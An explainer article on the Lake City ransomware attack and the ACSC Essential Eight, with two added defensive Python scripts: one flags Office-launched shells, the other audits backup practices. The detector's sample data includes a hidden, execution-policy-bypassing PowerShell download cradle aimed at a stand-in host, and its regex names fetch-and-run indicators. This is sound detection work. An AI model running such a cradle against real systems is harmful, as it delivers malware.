After being crippled by a ransomware attack, a Florida council sacked its IT manager and was forced to pay hackers US$460,000 to get its network back online.
Could following the Australian Cyber Security Centre's latest best-practice security guide have saved the manager's job and spared the council weeks of embarrassment?
The ACSC's Essential Eight Maturity Model is a checklist that organisations can use to evaluate the maturity of their security systems and prioritise upgrades.
Its latest update comes after Australia Post was found to be lacking on a number of fronts following an Australian National Audit Office cyber security review and the Commonwealth Bank was taken to task by the Australian Information Commissioner for its lax responses to privacy.
The checklist tells us how the Florida hack could have been avoided and shows that staying up to date with best-practice protocols could have at least reduced the risk of, if not outright prevented, all of these security embarrassments.
The Essential Eight
- Application whitelisting: Restrict the software and scripts that can be run on individual workstations
- Patch applications: Have the latest security updates for both applications and drivers installed on devices
- Restrict Microsoft Office macros: Only allow documents from trusted locations to run macros and don't give users write access
- Lock down web browsers: Block Flash content, web advertising and Java content from the internet
- Be careful with privileged access: Only allow privileged access to key personnel accessing the network by trusted means
- Patch operating systems: Keep systems up-to-date and retire equipment that vendors no longer support
- Multi-factor authentication: Any remote access should require multi-factor authentication
- Backups: Backups of important data, software and configuration settings are made regularly and tested
The Lake City ransomware hack could have been greatly mitigated by following the Essential Eight, sparing the council its capitulation to the hackers and saving the IT director's job.
Triple Threat
In the attack, Ryuk was delivered as the final part of a triple-threat attack that began with an email.
A council employee opened a phishing email and then its Microsoft Office attachment. When they did, a macro in the document executed a PowerShell command that downloaded the Emotet trojan.
Once Emotet was in the system, it then triggered the download of a second trojan: TrickBot.
TrickBot spreads by exploiting the EternalBlue Windows vulnerability – a patch for which had been issued in 2017.
Using TrickBot, the hacker gained remote access to the desktop, stole network administrator credentials, and determined whether or not the system was an appropriate target for ransomware.
Stolen admin credentials can be less effective for gaining remote access if the system requires multi-factor authentication.
With the stolen admin credentials, the hacker was able to deliver and spread the Ryuk ransomware across the council’s network, where it encrypted files and displayed a message demanding payment in Bitcoin.
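The first link in the chain described above, an Office document spawning PowerShell that fetches a payload, is also one of the most detectable. The following is an added example, not code from the article or from the ACSC: it scores constructed Sysmon-style process-creation events (the field names and sample hosts are assumed) and raises an alert when an Office application launches a shell, weighting the alert higher when the command line carries fetch-and-run or obfuscation indicators.

```python
"""Flag Office -> shell -> download behaviour in process-creation telemetry.

Added example with constructed events; not the article's or the ACSC's code.
Event layout (host, parent_image, image, command_line) is an assumption that
maps onto Sysmon Event ID 1 or Windows 4688 with command-line auditing enabled.
"""
from __future__ import annotations
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments associated with fetching and running remote content
# or hiding the console; each distinct hit adds to the score.
DOWNLOAD_HINTS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|iwr\b|net\.webclient|"
    r"start-bitstransfer|-encodedcommand|\s-e[nc]?\s|frombase64string|"
    r"bypass|hidden)",
    re.IGNORECASE,
)

@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return a risk score and the reasons that contributed to it."""
    reasons: list[str] = []
    score = 0
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent in OFFICE_PARENTS and child in SHELLS:
        score += 5  # the macro-to-shell hop on its own is worth an alert
        reasons.append(f"office_spawned_shell:{parent}->{child}")
    hits = sorted({m.group(0).strip().lower() for m in DOWNLOAD_HINTS.finditer(ev.command_line)})
    if hits:
        score += 2 * len(hits)
        reasons.append("suspicious_args:" + ",".join(hits))
    return score, reasons

def detect(events: list[ProcessEvent], threshold: int = 5) -> list[dict]:
    """Return alert records for every event at or above the threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"host": ev.host, "score": score, "reasons": reasons,
                           "cmd": ev.command_line})
    return alerts

# Constructed sample events (not real telemetry). The first mirrors the
# macro-launched download step; the second is a benign scheduled script;
# the third is Office spawning cmd.exe with an innocuous command line.
SAMPLE_EVENTS = [
    ProcessEvent("WS-FIN-07", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -nop -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
                 ".DownloadString('http://invoice-update.example/x')\""),
    ProcessEvent("WS-FIN-07", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -File C:\\scripts\\daily-report.ps1"),
    ProcessEvent("WS-HR-02", r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\cmd.exe", "cmd /c echo hello"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["host"], alert["score"], alert["reasons"])
```

Run over the constructed events, the Word-launched PowerShell scores 13 (the parent/child pair plus four command-line indicators), the Excel-launched cmd.exe scores 5 and still alerts because Office spawning any shell is the condition the "restrict macros" control exists to prevent, and the explorer-launched report script scores 0. Tune `threshold` and `SHELLS` to the estate; the parent/child rule is the durable signal, the string list is not.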
Daily backups would have helped the IT manager limit the impact of the Ryuk ransomware that took over his system.
The latest ACSC policy updates recommend testing backup restoration more frequently.
According to the ACSC, a mature backup system:
- Performs backups of critical information, software and configuration settings daily
- Stores backups either offline or online in a non-rewritable and non-erasable manner
- Stores backups for at least three months
- Tests the full restoration of backups when initially implemented and after each fundamental IT change
- Tests the partial restoration of backups every three months
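The five criteria above are concrete enough to check automatically against a backup inventory. The following is an added example, not the ACSC's or the article's code: it evaluates constructed backup metadata (the record layout and the 90-day reading of "three months" are assumptions) against each criterion and lists the ones that fail, which is the report a council IT manager would want before, not after, a ransomware incident.

```python
"""Assess backup metadata against the ACSC backup maturity criteria quoted above.

Added example with constructed data; not the article's or the ACSC's code.
Record layout is assumed; "three months" is read as 90 days.
"""
from __future__ import annotations
from dataclasses import dataclass
from datetime import date, timedelta

THREE_MONTHS = timedelta(days=90)

@dataclass
class BackupRecord:
    taken: date
    immutable: bool  # offline, or online but non-rewritable and non-erasable

@dataclass
class BackupProgramme:
    backups: list[BackupRecord]
    full_restore_tests: list[date]     # dates a full restoration was tested
    partial_restore_tests: list[date]  # dates a partial restoration was tested
    fundamental_changes: list[date]    # e.g. new backup platform, storage migration

def assess(prog: BackupProgramme, today: date) -> dict[str, bool]:
    """Return one pass/fail flag per criterion, evaluated as of `today`."""
    by_day = sorted(prog.backups, key=lambda b: b.taken)
    days = {b.taken for b in by_day}
    # 1. A backup exists for each of the last seven days (daily cadence).
    daily = all((today - timedelta(days=i)) in days for i in range(7))
    # 2. Every retained backup is offline or immutable, so ransomware that
    #    reaches the backup store cannot encrypt or delete it.
    immutable = bool(by_day) and all(b.immutable for b in by_day)
    # 3. The oldest retained backup is at least three months old.
    retained = bool(by_day) and (today - by_day[0].taken) >= THREE_MONTHS
    # 4. A full restore was tested at least once, and again after every
    #    fundamental change (no change may be newer than the last full test).
    full_ok = bool(prog.full_restore_tests) and all(
        any(t >= change for t in prog.full_restore_tests)
        for change in prog.fundamental_changes)
    # 5. A partial restore was tested within the last three months.
    partial_ok = any(today - t <= THREE_MONTHS for t in prog.partial_restore_tests)
    return {
        "daily_backups": daily,
        "immutable_storage": immutable,
        "retention_3_months": retained,
        "full_restore_tested": full_ok,
        "partial_restore_recent": partial_ok,
    }

def failing(report: dict[str, bool]) -> list[str]:
    """Criteria that did not pass, sorted for stable reporting."""
    return sorted(name for name, ok in report.items() if not ok)

# Constructed sample: daily backups since 1 March 2019, all on rewritable
# online storage; one full restore test at implementation but none after a
# platform change in May; last partial restore test in February.
AS_OF = date(2019, 7, 1)
SAMPLE = BackupProgramme(
    backups=[BackupRecord(AS_OF - timedelta(days=i), immutable=False) for i in range(123)],
    full_restore_tests=[date(2018, 1, 15)],
    partial_restore_tests=[date(2019, 2, 1)],
    fundamental_changes=[date(2019, 5, 10)],
)

if __name__ == "__main__":
    report = assess(SAMPLE, AS_OF)
    for name, ok in report.items():
        print(f"{name:24s} {'PASS' if ok else 'FAIL'}")
    print("failing:", failing(report))
```

On the constructed data the programme passes cadence and retention but fails immutability and both restore-test criteria: exactly the profile in which backups exist on paper yet are encrypted alongside production data or turn out not to restore. Feed it from the backup software's job history and change register and run it on a schedule rather than once.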